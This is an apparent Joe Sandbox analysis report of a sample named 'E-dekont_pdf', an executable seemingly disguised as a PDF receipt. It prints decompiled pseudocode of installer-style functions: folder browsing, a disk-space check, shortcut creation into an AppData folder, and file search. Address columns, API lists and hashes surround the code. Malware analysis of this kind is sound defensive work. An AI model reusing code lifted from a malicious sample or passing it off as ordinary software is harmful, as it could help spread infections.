                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6f130000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocGlobal
                                                                                              • String ID:
                                                                                              • API String ID: 3761449716-0
                                                                                              • Opcode ID: 793cb27f8fe6538abbd1c90328cf20e9b4663995a28e8ed4efd948cdb8facf74
                                                                                              • Instruction ID: d4b0eae47e9ad1ac23f43a6a84f5b442809e59681f448b906e24550a4d83de14
                                                                                              • Opcode Fuzzy Hash: 793cb27f8fe6538abbd1c90328cf20e9b4663995a28e8ed4efd948cdb8facf74
                                                                                              • Instruction Fuzzy Hash: FAB012F23004005FEE108718DE0AF303654F701754F000000F600E5040C12748208914
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 00404AB5 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 78%
                                                                                              			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x43e720; // 0x66d65c
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xe) + 0x471000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CAC(0x3fb, _t146);
							if(E0040603F(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406668(0x436718, _t146);
							_t87 = E00406A35("true");
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406668(0x436718, _t146);
								_t89 = E00405FE2(0x436718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x436718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x436718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x436718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F83(0x436718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x436718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F52(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x46823c + 0x10)) != _t158) {
									E00404F3A(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x436708);
									} else {
										E00404E71(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x470304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045E6(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x446738 == _t158) {
									E00404A0E();
								}
								 *0x446738 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x446748;
							_v60 = E00404E0B;
							_v56 = _t146;
							_v68 = E004066A5(_t146, 0x446748, _t167, 0x43a720, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F37(_t146);
								_t125 =  *((intOrPtr*)( *0x470270 + 0x11c));
								if( *((intOrPtr*)( *0x470270 + 0x11c)) != 0 && _t146 == 0x4c5000) {
									E004066A5(_t146, 0x446748, _t167, 0, _t125);
									if(lstrcmpiW(0x460200, 0x446748) != 0) {
										lstrcatW(_t146, 0x460200);
									}
								}
								 *0x446738 =  *0x446738 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
						E00405F37(_t146);
					}
					 *0x468238 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push("true");
					E004045C4(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045C4(_t167);
					E004045F9(_t166);
					_t138 = E00406A35(8);
					if(_t138 == 0) {
						L53:
						return E0040462B(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, "true");
						goto L8;
					}
				}
			}













































                                                                                              0x00404ab5
                                                                                              0x00404abb
                                                                                              0x00404ac1
                                                                                              0x00404ace
                                                                                              0x00404adc
                                                                                              0x00404adf
                                                                                              0x00404ae7
                                                                                              0x00404aed
                                                                                              0x00404aed
                                                                                              0x00404af9
                                                                                              0x00404afc
                                                                                              0x00404b6a
                                                                                              0x00404b71
                                                                                              0x00404c48
                                                                                              0x00404c4f
                                                                                              0x00404c5e
                                                                                              0x00404c5e
                                                                                              0x00404c62
                                                                                              0x00404c6c
                                                                                              0x00404c79
                                                                                              0x00404c7b
                                                                                              0x00404c7b
                                                                                              0x00404c89
                                                                                              0x00404c90
                                                                                              0x00404c97
                                                                                              0x00404c9a
                                                                                              0x00404cd6
                                                                                              0x00404cd8
                                                                                              0x00404cde
                                                                                              0x00404ce3
                                                                                              0x00404ce7
                                                                                              0x00404ce9
                                                                                              0x00404ce9
                                                                                              0x00404d05
                                                                                              0x00000000
                                                                                              0x00404d07
                                                                                              0x00404d0a
                                                                                              0x00404d18
                                                                                              0x00404d1e
                                                                                              0x00404d1f
                                                                                              0x00404d22
                                                                                              0x00404d25
                                                                                              0x00000000
                                                                                              0x00404d25
                                                                                              0x00404c9c
                                                                                              0x00404c9e
                                                                                              0x00404ca2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404ca4
                                                                                              0x00404ca4
                                                                                              0x00404cb1
                                                                                              0x00404cb6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404cba
                                                                                              0x00404cbc
                                                                                              0x00404cbc
                                                                                              0x00404cc5
                                                                                              0x00404cc7
                                                                                              0x00404ccc
                                                                                              0x00404ccf
                                                                                              0x00404cd4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404cd4
                                                                                              0x00404d31
                                                                                              0x00404d3b
                                                                                              0x00404d3e
                                                                                              0x00404d41
                                                                                              0x00404d48
                                                                                              0x00404d48
                                                                                              0x00404d4a
                                                                                              0x00404d4a
                                                                                              0x00404d4f
                                                                                              0x00404d51
                                                                                              0x00404d59
                                                                                              0x00404d60
                                                                                              0x00404d62
                                                                                              0x00404d6d
                                                                                              0x00404d6d
                                                                                              0x00404d62
                                                                                              0x00404d7d
                                                                                              0x00404d87
                                                                                              0x00404d8f
                                                                                              0x00404daa
                                                                                              0x00404d91
                                                                                              0x00404d9a
                                                                                              0x00404d9a
                                                                                              0x00404d8f
                                                                                              0x00404daf
                                                                                              0x00404db4
                                                                                              0x00404db9
                                                                                              0x00404dc2
                                                                                              0x00404dc2
                                                                                              0x00404dcb
                                                                                              0x00404dcd
                                                                                              0x00404dcd
                                                                                              0x00404dd9
                                                                                              0x00404de1
                                                                                              0x00404deb
                                                                                              0x00404deb
                                                                                              0x00404df0
                                                                                              0x00000000
                                                                                              0x00404df0
                                                                                              0x00404c9a
                                                                                              0x00404c51
                                                                                              0x00404c58
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404c58
                                                                                              0x00404b77
                                                                                              0x00404b80
                                                                                              0x00404b9a
                                                                                              0x00404b9f
                                                                                              0x00404ba9
                                                                                              0x00404bb0
                                                                                              0x00404bbc
                                                                                              0x00404bbf
                                                                                              0x00404bc2
                                                                                              0x00404bc9
                                                                                              0x00404bd1
                                                                                              0x00404bd4
                                                                                              0x00404bd8
                                                                                              0x00404bdf
                                                                                              0x00404be7
                                                                                              0x00404c41
                                                                                              0x00404be9
                                                                                              0x00404bea
                                                                                              0x00404bf1
                                                                                              0x00404bfb
                                                                                              0x00404c03
                                                                                              0x00404c10
                                                                                              0x00404c24
                                                                                              0x00404c28
                                                                                              0x00404c28
                                                                                              0x00404c24
                                                                                              0x00404c2d
                                                                                              0x00404c3a
                                                                                              0x00404c3a
                                                                                              0x00404be7
                                                                                              0x00000000
                                                                                              0x00404b9f
                                                                                              0x00404b8d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404b93
                                                                                              0x00000000
                                                                                              0x00404afe
                                                                                              0x00404b0b
                                                                                              0x00404b14
                                                                                              0x00404b21
                                                                                              0x00404b21
                                                                                              0x00404b28
                                                                                              0x00404b2e
                                                                                              0x00404b37
                                                                                              0x00404b3a
                                                                                              0x00404b3d
                                                                                              0x00404b45
                                                                                              0x00404b48
                                                                                              0x00404b4b
                                                                                              0x00404b51
                                                                                              0x00404b58
                                                                                              0x00404b5f
                                                                                              0x00404df6
                                                                                              0x00404e08
                                                                                              0x00404b65
                                                                                              0x00404b68
                                                                                              0x00000000
                                                                                              0x00404b68
                                                                                              0x00404b5f

                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404B04
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                                              • lstrcmpiW.KERNEL32(Call,00446748,00000000,?,?), ref: 00404C1C
                                                                                              • lstrcatW.KERNEL32(?,Call), ref: 00404C28
                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C3A
                                                                                                • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00002000,00404C71), ref: 00405CBF
                                                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,763F3420,004D5000,?,0040361B,004D5000,004D5000,00403923), ref: 00406952
                                                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,004D5000,004D5000,00403923), ref: 00406961
                                                                                                • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,763F3420,004D5000,?,0040361B,004D5000,004D5000,00403923), ref: 00406966
                                                                                                • Part of subcall function 004068EF: CharPrevW.USER32(?,?,763F3420,004D5000,?,0040361B,004D5000,004D5000,00403923), ref: 00406979
                                                                                              • GetDiskFreeSpaceW.KERNEL32(00436718,?,?,0000040F,?,00436718,00436718,?,?,00436718,?,?,000003FB,?), ref: 00404CFD
                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                                                • Part of subcall function 00404E71: lstrlenW.KERNEL32(00446748,00446748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                                • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                                                • Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00446748), ref: 00404F2E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: A$Call$HgD
                                                                                              • API String ID: 2624150263-3994852493
                                                                                              • Opcode ID: 57e42c488c30fac2921128dcf62f9e8b05ba6fcefb72b84f5d43e0b192a985f6
                                                                                              • Instruction ID: c51e7580995e792457c126f6717c920f984a5adb5ab4ba9b793ec1e64c8e9cb2
                                                                                              • Opcode Fuzzy Hash: 57e42c488c30fac2921128dcf62f9e8b05ba6fcefb72b84f5d43e0b192a985f6
                                                                                              • Instruction Fuzzy Hash: 3FA172B1901209ABDB11EFA5CD45EAF77B8EF84318F11843BF601B62D1DB7C89418B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 67%
                                                                                              			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, "true", 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Roaming\\Uundvrligheden\\Rendejerns");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), "true");
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                                              0x004021b3
                                                                                              0x004021bd
                                                                                              0x004021c7
                                                                                              0x004021d1
                                                                                              0x004021dc
                                                                                              0x004021df
                                                                                              0x004021f9
                                                                                              0x004021fc
                                                                                              0x00402202
                                                                                              0x00402205
                                                                                              0x0040220f
                                                                                              0x00402213
                                                                                              0x00402213
                                                                                              0x00402218
                                                                                              0x00402229
                                                                                              0x00402231
                                                                                              0x004022e8
                                                                                              0x004022e8
                                                                                              0x004022ef
                                                                                              0x00402237
                                                                                              0x00402237
                                                                                              0x00402246
                                                                                              0x0040224a
                                                                                              0x0040224d
                                                                                              0x00402253
                                                                                              0x00402261
                                                                                              0x00402264
                                                                                              0x00402266
                                                                                              0x00402271
                                                                                              0x00402271
                                                                                              0x00402276
                                                                                              0x00402278
                                                                                              0x0040227f
                                                                                              0x0040227f
                                                                                              0x00402282
                                                                                              0x0040228b
                                                                                              0x0040228e
                                                                                              0x00402294
                                                                                              0x00402296
                                                                                              0x004022a0
                                                                                              0x004022a0
                                                                                              0x004022a3
                                                                                              0x004022ac
                                                                                              0x004022af
                                                                                              0x004022b8
                                                                                              0x004022be
                                                                                              0x004022c0
                                                                                              0x004022ce
                                                                                              0x004022ce
                                                                                              0x004022d1
                                                                                              0x004022d7
                                                                                              0x004022d7
                                                                                              0x004022da
                                                                                              0x004022e0
                                                                                              0x004022e6
                                                                                              0x004022fb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004022e6
                                                                                              0x004022f1
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(004084E4,?,?,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns, xrefs: 00402269
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID: C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns
                                                                                              • API String ID: 542301482-74610845
                                                                                              • Opcode ID: 69338933f8cb4205f9b0113d85e0be7cd91fca6fdadc036f24a808d8ded11bd5
                                                                                              • Instruction ID: a498918f0017c776c583d301c0d9889a109f513c08bb955c9b12fa31a6444d8a
                                                                                              • Opcode Fuzzy Hash: 69338933f8cb4205f9b0113d85e0be7cd91fca6fdadc036f24a808d8ded11bd5
                                                                                              • Instruction Fuzzy Hash: 29411571A00209EFCF40DFE4C989E9D7BB5BF49308B2045AAF505EB2D1DB799981CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 39%
                                                                                              			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                                                              0x00402923
                                                                                              0x0040293e
                                                                                              0x00402949
                                                                                              0x0040294a
                                                                                              0x00402a94
                                                                                              0x00402925
                                                                                              0x00402928
                                                                                              0x0040292b
                                                                                              0x0040292e
                                                                                              0x0040292e
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindFirst
                                                                                              • String ID:
                                                                                              • API String ID: 1974802433-0
                                                                                              • Opcode ID: 85aad7039e25a9aa9b35d16ee4a41030868de3965d46ad799a5498b862af6052
                                                                                              • Instruction ID: fb3f61e96e98deee36c7331a1bc93a87c3ebb652d9f25a3850070bd9d7c70ba4
                                                                                              • Opcode Fuzzy Hash: 85aad7039e25a9aa9b35d16ee4a41030868de3965d46ad799a5498b862af6052
                                                                                              • Instruction Fuzzy Hash: F4F05E71904105EADB01DBB4ED49AAEB378EF14314F20457BE105F21D0E7B88E529B29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 96%
                                                                                              			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x470288;
				_v28 =  *0x470270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x470279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x4018 + _t301 + 8) =  *(_t239 * 0x4018 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x4018 + _t301 + 8) =  *(_t239 * 0x4018 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x4018 + _t94;
									_t247 =  *_t301;
